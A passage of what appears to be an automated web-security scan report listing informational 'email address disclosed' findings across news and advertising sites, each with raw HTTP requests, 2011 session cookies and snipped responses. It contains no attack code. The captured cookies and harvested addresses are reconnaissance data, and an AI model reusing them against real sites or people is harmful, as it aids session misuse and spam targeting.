<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.29. http://advertising.aol.com/token/8/3/144927758/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/144927758/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:47:32 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
21.30. http://cdn.uproxx.com/wp-content/themes/ur_v3/js/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.uproxx.com
Path:   /wp-content/themes/ur_v3/js/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/ur_v3/js/jquery.colorbox.js HTTP/1.1
Host: cdn.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 17:35:34 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Tue, 24 May 2011 22:23:32 GMT
ETag: "5c66-4a40d09c0c100"-gzip
Cache-Control: max-age=31536000
Expires: Sat, 04 Aug 2012 01:01:48 GMT
Vary: Accept-Encoding
Content-Length: 23654
X-Cache: HIT
Accept-Ranges: bytes

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for detail
...[SNIP]...
21.31. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.manilla.com
Path:   /wp-content/themes/manilla-1.2/css/style.css

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/manilla-1.2/css/style.css?ver=3.2.1 HTTP/1.1
Host: cdn1.manilla.com
Proxy-Connection: keep-alive
Referer: http://www.manilla.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 16:35:44 GMT
Content-Type: text/css
Connection: keep-alive
Last-Modified: Wed, 14 Sep 2011 13:04:12 GMT
Expires: Sun, 18 Sep 2011 13:43:54 GMT
Cache-Control: max-age=172800
X-Cache: HIT
Content-Length: 54147

@import url(reset.css);
@import url(jquery.fancybox.1.3.4.css);
@import url(jquery.jscrollpane.css);

/*
Author: Tom Rose (tom@slurve.com)
Author URI: http://slurve.com
Date: 21 May 2011
*/

/* ---------------------------------------------------------------------------------------------------------------------- global */

body {
   margi
...[SNIP]...
21.32. http://corporate.local.com/mk/get/advertising-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.local.com
Path:   /mk/get/advertising-opportunities

Issue detail

The following email address was disclosed in the response:

Request

GET /mk/get/advertising-opportunities HTTP/1.1
Host: corporate.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1; s_cc=true; campid=710; s_nr=1316295523375; s_sq=%5B%5BB%5D%5D; scorecardresearch=645461750-1183165914-1316295498491; __utma=177062200.605228499.1316295499.1316295499.1316295499.1; __utmb=177062200.1.10.1316295499; __utmc=177062200; __utmz=177062200.1316295499.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|273A6659051D259E-40000130E002F1B9[CE]; __qca=P0-1368744640-1316295502134; k_push8=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:57:34 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html

<!doctype html>

<html lang="en" class="no-js">

<head>

       <title>Exact Match Local Business Solutions : Local.com - 800-984-4155</title>

       <meta name="description" content="Exact Match L
...[SNIP]...
<a id="email" href="mailto:advertisewithus@local.com"
title="Email">
...[SNIP]...
21.33. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/thesis/custom/js/s_code.js HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Apr 2011 17:47:55 GMT
ETag: "2e3e6-54c5-4a1491ba008c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 21701
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 16:24:53 GMT
Connection: close

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
U
...[SNIP]...
#St`Rvt)`b+s.hav()+q+(qs?qs:s.rq(^E)),0#H);qs`k;`am('t')`5s.p_r)s.p_r()}^A(qs);@8`s($0;`p$0`N^C,`G$P1',vb`U@P=^V=s.`P`j=s.`P^U=`E@9@7=@D=^y=^yv1=^yv2=^yv3`k`5#E)`E@9@P"
+"=`E@9eo=`E@9`P`j=`E@9`P^U`k`5!id@0s.tc){s.tc=1;s.flush`d()}`2#1`9tl`0o,t,n,vo`1;s.@P=$Fo`U`P^U=t;s.`P`j=n;s.t($0}`5pg){`E@9co`0o){`I@R\"_\",1,#X`2$Fo)`9wd@9gs`0$C{`I@R#41,#X`2s.t()`9wd@9dc`0$C{`I@R"
+"#4#X`2s.t()}}@B=(`E`K`c`8`4$Ds@u0`Ud=^
...[SNIP]...
21.34. http://internetmarketing.localedge.com/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetmarketing.localedge.com
Path:   /js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.hoverIntent.minified.js HTTP/1.1
Host: internetmarketing.localedge.com
Proxy-Connection: keep-alive
Referer: http://internetmarketing.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 20:46:31 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6 mod_jk/1.2.30
Last-Modified: Wed, 07 Sep 2011 19:35:13 GMT
ETag: "3b001d-646-4ac5f0afbfe40"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: application/javascript
Age: 316
X-Cache: HIT from wd-44
Via: 1.0 wd-44 (squid/3.1.11)
Connection: keep-alive

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
21.35. http://static.localedge.com/common/js/api/localedge.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.localedge.com
Path:   /common/js/api/localedge.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/api/localedge.js HTTP/1.1
Host: static.localedge.com
Proxy-Connection: keep-alive
Referer: http://internetmarketing.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:25:14 GMT
Server: Apache/2.2.19 (Unix) mod_jk/1.2.30
Last-Modified: Fri, 16 Sep 2011 14:30:00 GMT
ETag: "153df2-b39-4ad0fd4042a00"
Accept-Ranges: bytes
Content-Length: 2873
Content-Type: application/javascript

/**
* @fileoverview Parent namespace for all localedge.* APIs.
* @author Josh Johnson jjohnson@localedge.com
*
* All code under this name space should be agnostic of the DOM.
*/

/**
* @namespace
*/
if (typeof(localedge) == 'undefined') {
   var localedge = {};
}

(function() {
   var scripts = document.get
...[SNIP]...
21.36. http://static.localedge.com/common/js/api/localedge.localedgemedia.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.localedge.com
Path:   /common/js/api/localedge.localedgemedia.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/api/localedge.localedgemedia.js HTTP/1.1
Host: static.localedge.com
Proxy-Connection: keep-alive
Referer: http://internetmarketing.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:25:14 GMT
Server: Apache/2.2.19 (Unix) mod_jk/1.2.31
Last-Modified: Fri, 16 Sep 2011 14:29:40 GMT
ETag: "86825-2767-4ad0fd2d2fd00"
Accept-Ranges: bytes
Content-Length: 10087
Content-Type: application/javascript

/**
* @fileoverview LocalEdge Media API
* @author Josh Johnson jjohnson@localedge.com
*/

window.localedge = window.localedge || {};

/**
* @namespace
*/
localedge.localedgemedia = {};

/**
* @class LocalEdgeMediaStatus
*/
localedge.localedgemedia.Status = {

   /**
    * Request comp
...[SNIP]...
21.37. http://www.gather.com/js/niftycube.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /js/niftycube.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/niftycube.js HTTP/1.1
Host: www.gather.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0E4D838206BDB859EE02307D40936463; vis=NHlt+Lk5IZ3dxgr1zkbTl8TLnORF3qkd0LfP/8B7QAiD3p8la3P/7EGo6KG91aOe2Hyf1U+5+OJj+x4v6P757yEro+IXWkIi7xRVJTV8tC3VPlJZjj46fM56l5aedSs7; gathersid=www06

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:41 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Last-Modified: Wed, 03 Mar 2010 20:13:33 GMT
ETag: "150284-22c4-480eb1dd4d540"
Accept-Ranges: bytes
Content-Length: 8900
Content-Type: application/javascript

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...
21.38. http://www.local.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public, max-age: 2592000
Content-Type: application/x-javascript
Date: Sat, 17 Sep 2011 16:24:38 GMT
ETag: "1cfb478e197fb5e7142cfaf9d58bac51+gzip"
Expires: Mon, 17 Sep 2012 09:24:38 GMT
Last-Modified: Fri, 16 Sep 2011 01:54:16 GMT
Server: ECD (sjo/52C4)
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Cache: HIT
X-CacheLevel: etag
X-Powered-By: ASP.NET
Content-Length: 20798


var s=s_gi(s_account)
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,ppt,pptx"
s.linkIntern
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...
21.39. http://www.misquincemag.com/cm/shared/scripts/jquery.json.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /cm/shared/scripts/jquery.json.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cm/shared/scripts/jquery.json.js HTTP/1.1
Host: www.misquincemag.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "1bb006-48db-48561512bfef7"
Vary: Accept-Encoding
X-Pad: avoid browser bug
Cache-Control: max-age=2445373
Date: Sat, 17 Sep 2011 16:24:57 GMT
Content-Length: 18651
Connection: close

/*
based on
http://www.JSON.org/json2.js
2008-11-19

jQuery plugin info:
@author Jim Dalton (jim.dalton@furrybrains.com)
@date 1/15/2009
@version 1.0

Comments below were modified to reflect usage in the context of jQuery. Otherwise
these comments are identical to the source library.

Public
...[SNIP]...
21.40. http://www.realage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=480
Date: Sat, 17 Sep 2011 16:30:15 GMT
Content-Length: 106452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   
   
       <meta http-equiv="
...[SNIP]...
<a href="mailto:feedback@realage.com">
...[SNIP]...
21.41. http://www.seattlepi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 133999
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
<a href="mailto:newmedia@seattlepi.com">newmedia@seattlepi.com</a>
...[SNIP]...
21.42. http://www.seattlepi.com/flashtalking/ftlocal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /flashtalking/ftlocal.html

Issue detail

The following email address was disclosed in the response:

Request

GET /flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg HTTP/1.1
Host: www.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: btype=web; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; zvents_tracker_sid=13162946948850.7696152536664158; adx=c174511@1316381121@1; aDxT=0.39756556041538715; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:53:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 29368
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:58:06 GMT
x-cdn: Cotendo
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
...[SNIP]...
<a href="mailto:newmedia@seattlepi.com">newmedia@seattlepi.com</a>
...[SNIP]...
21.43. http://www.seventeen.com/cm/shared/scripts/jquery.selectbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /cm/shared/scripts/jquery.selectbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cm/shared/scripts/jquery.selectbox.js HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "1c3309-180d-489c98c1d3f2d"
Vary: Accept-Encoding
Cache-Control: max-age=3893277
Date: Sat, 17 Sep 2011 16:25:03 GMT
Content-Length: 6157
Connection: close

/**
* jQuery custom selectboxes
*
* Copyright (c) 2008 Krzysztof Suszynski (suszynski.org)
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* @ve
...[SNIP]...
<k.suszynski@wit.edu.pl>
...[SNIP]...
21.44. http://www.stamfordadvocate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stamfordadvocate.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Edge-Control: !no-store, !bypass-cache, cache-maxage=0s, downstream-ttl=300s
Content-Length: 146578
Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
make a difference in someone's life is essential. Valid driver's license, HS Diploma/equiv req'd. Great benefits package, competitive salary, and opportunities for growth! Email/Fax/or send resume to: jobs@abilitybeyonddisability.org
fax: 203-775-4688 Human Resources Ability Beyond Disability,
4 Berkshire Blvd. Bethel, CT 06801 EOE/AA.<a class="less" href="#">
...[SNIP]...
21.45. http://www.stamfordadvocate.com/js/omniture/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stamfordadvocate.com
Path:   /js/omniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/omniture/s_code.js HTTP/1.1
Host: www.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: btype=web

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 22 Dec 2010 22:31:24 GMT
ETag: "8ce9-502a8700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 36073
Content-Type: application/x-javascript
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:01 GMT
x-cdn-view: static files
Connection: Keep-Alive

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
21.46. http://www.thedailygreen.com/cm/shared/scripts/jquery.json.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /cm/shared/scripts/jquery.json.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cm/shared/scripts/jquery.json.js HTTP/1.1
